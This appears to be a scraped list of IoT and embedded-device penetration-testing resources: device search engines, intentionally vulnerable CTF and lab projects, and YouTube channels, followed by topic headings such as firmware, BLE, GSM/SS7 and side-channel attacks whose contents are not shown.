Search Engines for IoT Devices

  1. Shodan
  2. FOFA
  3. Censys
  4. Zoomeye

CTF For IoT’s And Embedded

  1. https://github.com/hackgnar/ble_ctf
  2. https://www.microcorruption.com/
  3. https://github.com/Riscure/Rhme-2016
  4. https://github.com/Riscure/Rhme-2017
  5. https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html
  6. https://github.com/scriptingxss/IoTGoat

YouTube Channels for IoT Pentesting

  1. Liveoverflow
  2. Binary Adventure
  3. EEVBlog
  4. JackkTutorials
  5. Craig Smith
  6. iotpentest [Mr-IoT]
  7. Besim ALTINOK – IoT – Hardware – Wireless
  8. Ghidra Ninja

IoT security vulnerabilities checking guides

Exploitation Tools & OS

Reverse Engineering Tools


IoT Protocols Pentesting





Radio IoT Protocols Overview

Base transceiver station (BTS)

GSM & SS7 Pentesting

Zigbee & Zwave

BLE Intro and Tools

BLE Pentesting Tutorials

Mobile security (Android & iOS)


Firmware Pentest

Firmware to pentest

IoT hardware Overview

Hardware Gadgets to pentest

Attacking Hardware Interfaces



SideChannel Attacks